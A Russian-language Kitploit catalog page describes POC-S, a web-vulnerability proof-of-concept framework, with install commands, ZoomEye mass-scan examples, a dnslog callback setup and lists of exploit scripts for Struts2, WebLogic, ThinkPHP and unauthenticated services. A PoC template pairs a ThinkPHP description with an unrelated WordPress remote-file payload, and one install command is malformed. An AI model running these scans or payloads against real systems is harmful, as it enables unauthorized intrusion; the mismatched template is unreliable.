Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
POC-S — POC-S — усиленная версия POC-T для быстрой проверки уязвимостей веб-приложений в ходе красно-синих учений (Red Team / Blue Team). Функциональность расширена, скрипты добавлены с классификацией, встроены dnslog и другие средства. Платформа дополнена высоконадёжными POC из целей vulhub и других открытых проектов. | Kitploit
Инструменты/GitHubGitHub/jiangsir404/poc-s
РазведкаСканеры уязвимостейФреймворки для эксплойтовСбор информацииВеб-безопасностьФаззингТестирование на ПроникновениеАнализ DNS
GitHubjiangsir404/poc-s

POC-S

Репозиторий
356646 лет назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →

Описание

POC-S — усиленная версия POC-T для быстрой проверки уязвимостей веб-приложений в ходе красно-синих учений (Red Team / Blue Team). Функциональность расширена, скрипты добавлены с классификацией, встроены dnslog и другие средства. Платформа дополнена высоконадёжными POC из целей vulhub и других открытых проектов.

Поделиться

POC-S: POC-T Strengthen Version POC-T加强版

Документация POC-T в виде wiki находится в каталоге doc

Предисловие: в настоящее время

Отказ от ответственности

Использование POC-S для атаки на цель без предварительного обоюдного согласия является незаконным. POC-S предназначен только для целей тестирования безопасности.

Особенности

  • Совместимость с синтаксисом POC-T
  • Хорошая классификация PoC, гибкий способ загрузки PoC, поддержка загрузки одиночных файлов, пакетной загрузки, загрузки из произвольных каталогов
  • Предоставляет терминальные команды pocs/poc-s, отделяющие фреймворк от PoC, позволяя размещать собственные PoC в любом каталоге
  • Предоставляет простую DNS-платформу, для работы которой требуется только один домен и один публичный IP; можно использовать для быстрой проверки слепых инъекций команд и SQL-инъекций, просто и эффективно.
  • Предоставляет хорошие скрипты модульного тестирования

TODO

  • Сбор и доработка PoC на основе целей Vulhub и открытых проектов; подробнее см. в моей классификации PoC
  • Предоставление параметра --init для динамического обновления файла конфигурации tookit.conf, например: --init zoomeye, инициализация конфигурации ZoomEye
  • Добавление платформ dnslog и weblog для быстрой проверки уязвимостей
  • Добавление двух плагинов проверки: ceye.py и dnslog.py
  • Добавление pocsapi.py, функциональности, подобной sqlmapapi
  • Добавление версии POC-S для Python 3

Использование

Поскольку сторонние интерфейсы требуют аутентификации, можно инициализировать соответствующую конфигурацию интерфейса с помощью параметра --init, например: --init zoomeye

root@kitploit:~
pip install pocs

Установка из исходников:

root@kitploit:~
git clone https://github.com/jiangsir404/POC-S.git
mv pocs/toolkit.conf.bak mv pocs/toolkit.conf
python setup.py install

Если при установке pocs через pip возникает ошибка Some files missing, необходимо перейти в каталог установки pocs (python2.7\Lib\site-packages\pocs) и переименовать tookit.conf. Если возникает предупреждение WARNING: Generating metadata for package cachetools produced metadata for project name unknown. Fix your #egg=cachetools fragments., это проблема зависимостей пакетов. Пожалуйста, проверьте и обновите версии нескольких пакетов: setuptools==39.0.1 cachetools==3.1.1 google-api-python-client==1.7.11

  1. Более гибкий способ загрузки плагинов
root@kitploit:~
pocs -s test/test2.py -iS 127.0.0.1 # загрузить скрипт script/test/test2.py
pocs -s test2 -iS 127.0.0.1 # загрузить скрипт script/test2.py

pocs -b test -iS 127.0.0.1 # пакетная загрузка всех скриптов из каталога /script/test
pocs -b test -s test2.py -iS 127.0.0.1 # загрузить скрипт script/test/test2.py

pocs -s myself_script.py -iS 127.0.0.1 # загрузить собственный скрипт и каталог скриптов
pocs -b mydir -iS 127.0.0.1
  1. Использование поисковых систем
root@kitploit:~
pocs --init zoomeye // инициализация конфигурации ZoomEye
pocs -b redis -t 50 -aZ "port:6379" --limit 50 -o res.txt
pocs -s test2.py -aZ "ThinkPHP"

Пакетный поиск уязвимости CNVD-2020-10487 Tomcat AJP LFI с помощью ZoomEye:

root@kitploit:~
pip install pocs
pocs -b apache -aZ "app:tomcat" --limit 50 -t 30 -o ajp.txt

  1. Использование платформы dnslog

Если вас беспокоит нестабильность ceye, и у вас нет времени и сил разворачивать платформу DNSLog (требуется два домена, один публичный IP, а также возможность изменять DNS-серверы домена), то можете попробовать простую платформу dnslog, предоставляемую POC-S. Для её развёртывания требуется только один домен и один публичный IP; предоставляется API для проверки (без интерфейса).

Предположим, dnslog.xxx.cn – ваш публичный домен, x.x.x.x – публичный IP. Убедитесь, что dnslog.xxx.cn может корректно разрешаться в x.x.x.x, иначе API не будет доступен. На публичном IP (x.x.x.x) выполните команду:

root@kitploit:~
pip install pocs
pocs_dnslog -h 0.0.0.0 -p 88 (если не установлено через pip, можно напрямую запустить скрипт pocs.dnslog.py)
>>> dns domain: dnslog.xxx.cn
>>> api key: rivir
>>>dns ip: x.x.x.x

Команда для DNS log поддерживает только nslookup: nslookup 1234.dnslog.xxx.cn x.x.x.x

Если вы хотите использовать команду ping 1234.dnslog.xxx.cn, вы также можете настроить собственный сервер доменных имён для домена xxx.cn (см. конфигурацию DNSLog).

Команда для web log: curl http://dnslog.xxx.cn:88/weblog/poc123

Адрес API: http://x.x.x.x:88/api/?token={token}&type={dns}&filter=1234.dnslog.xxx.cn Параметры: - token обязательный, api_key, введённый при настройке dnslog - type обязательный, возможные значения: dns/web - filter необязательный, фильтрация записей, точное совпадение

POC

pocs предоставляет более гибкий способ классификации плагинов. На данный момент собраны четыре типа PoC: Fuzz PoC, OWASP PoC, Vuln PoC, Tool PoC. Что касается PoC, будут по возможности собраны уже существующие PoC с GitHub, но не слишком много; личные сборки остаются за пользователем.

Написание PoC будет по возможности стандартизировано, следуя стилю POC-T. Пример:

root@kitploit:~
#!/usr/bin/env python		
#coding:utf-8

"""
ThinkPHP5 <=5.0.22/<=5.1.29 Remote Code Execution Vulnerability

Desc
    10 декабря 2018 года в полдень официальный аккаунт ThinkPHP опубликовал уведомление об обновлении, содержащее информацию о высокорискованной уязвимости, позволяющей получить доступ к серверу во всех версиях серии 5.x.
    Из-за недостаточной проверки имени контроллера при отключённом принудительном маршрутизации возможна уязвимость получения доступа к серверу.
    Затронутые версии: все до 5.0.23 и 5.1.31 соответственно. Рекомендуется как можно скорее обновиться до последней версии.
Version
	ThinkPHP5.0 version <= 5.0.22 ThinkPHP5.1 version <= 5.1.29
Usage:
	1. python POC-S.py -s 
	2. POC: /wp-admin/admin-post.php?swp_debug=load_options&swp_url=http://lj.s7star.cn/info.txt
Referer
	https://www.seebug.org/vuldb/ssvid-9771
"""

import requests

def poc(url):
    pass

Vuln PoC

В основном взяты из плагинов Vulhub и встроенных PoC POC-T, добавлены только высокодоступные PoC. Каждый из перечисленных ниже PoC был проверен на работоспособность в собственной среде. Если какой-либо PoC содержит ошибку, пожалуйста, создайте issue.

  • struts2
    • s2-005.py
    • s2-015.py
    • s2-016.py
    • s2-032.py
    • s2-045.py
    • s2-052.py
    • s2-053.py
    • s2-057.py
    • struts2-devmode.py
  • weblogic
    • weblogic-ssrf-netmap.py cve-2014-4210
    • weblogc-cve-2017-10271.py (CVE-2017-10271)
    • weblogic-cve-2018-2628.py
    • weblogic-cve-2019-2725.py
    • weblogic-cve-2019-2729.py

Fuzz PoC

Источник: boy-hack/POC-T

  • bakfile: обнаружение файлов резервных копий
  • crossdomain: crossdomain
  • dzxss
  • gitleak
  • issparse
  • ms15-034
  • phpinfo
  • phpmyadmin
  • svnleak
  • swf
  • tomcat_xmlleak
  • wordspace

OWASP PoC

Скрипты обнаружения из источника hunter

  • cmd_exec
  • sql_injection
  • xss
  • xxe
  • csrf
  • jsonp_xss
  • jsonp_hijacking
  • file_read
  • ssti
  • ssrf

Tool PoC

Некоторые распространённые PoC инструментального типа, предоставляющие поисковые системы, информационный поиск и другие функции

  • bing-dork поиск Bing
  • bingc обратный поиск IP по домену, поиск доменов C-сегмента на основе поисковой системы Bing
  • google-dork поиск Google
  • cdn-detect обнаружение CDN
  • waf обнаружение WAF и возврат URL без WAF
  • craw сбор связанных адресов в ссылках
  • vulscan обнаружение SQL-инъекций
  • portscan сканирование портов, обнаружение служб со слабыми паролями
  • domain2ip преобразование домена в IP
  • whois запрос whois-информации
  • icp запрос ICP

Другие открытые PoC, например, с https://github.com/boy-hack/airbug, содержат некоторые PoC, которые можно использовать напрямую, но есть библиотека HackReqeust, написанная на Python 3, которую нужно адаптировать под Python 2. Вы можете напрямую установить мою адаптированную библиотеку для Python 2: https://github.com/jiangsir404/hack-requests

Скачать инструмент
  • weblogic-cve-2020-2551.py
  • weblogic-upload-getshell.py (CVE-2018-2894)
  • thinkphp
    • 5-rce
    • 5.0.23-rce
  • Jenkins
    • jenkins-cve-2015-8103.py
    • jenkins-cve-2017-1000353.py
    • jenkins-cve-2018-1000861.py
  • weakpass
    • mysql
    • redis
    • mongo
    • sqlserver
    • ftp
    • telent
    • слабые пароли web (общие, без капчи)
    • http-basic-auth
    • coremail
    • jboss
    • jenkins
    • weblogic
  • unauth
    • redis-unauth.py
    • mongodb-unauth.py
    • memcached-unauth.py
    • elasticsearch-unauth.py
    • kubernetes-unauth.py
    • jenkins-unauth.py
    • docker-unauth-rce.py
    • hadoop-unauth.py
  • apache
    • CNVD-2020-10487 tomcat-ajp-lfi.py
    • tomcat-upload.py
    • tomcat-weak-pass.py
  • Citrix
    • cve-2019-19781
  • supervisor
    • supervisord-RCE-CVE-2017-11610.py
  • Jboss
    • jboss-rce.py
    • CVE-2017-12149
    • CVE-2013-4810
  • spring
    • spring-oauth2-rce.py
    • cve-2018-1273
  • phpmyadmin
    • phpmyadmin-auth-rce.py
    • phpmyadmin4.8.1-RFI.py
  • kibana
    • cve-2019-7609
    • cve-2018-17246
  • php
    • fpm-rce.py
    • CVE-2019-11043
    • CVE-2018-19518
  • discuz
    • x3.4-arbitrary-file-deletion
  • zabbix
    • zabbix-jsrpc-mysql-exp.py
    • zabbix-jsrpc-sqli.py
    • zabbix-weakpass.py
    • zabbix_latest_sqli.py
  • dns-zone-transfer
  • confluence
    • confulence-traversal.py
    • обход каталогов и выполнение команд в Confluence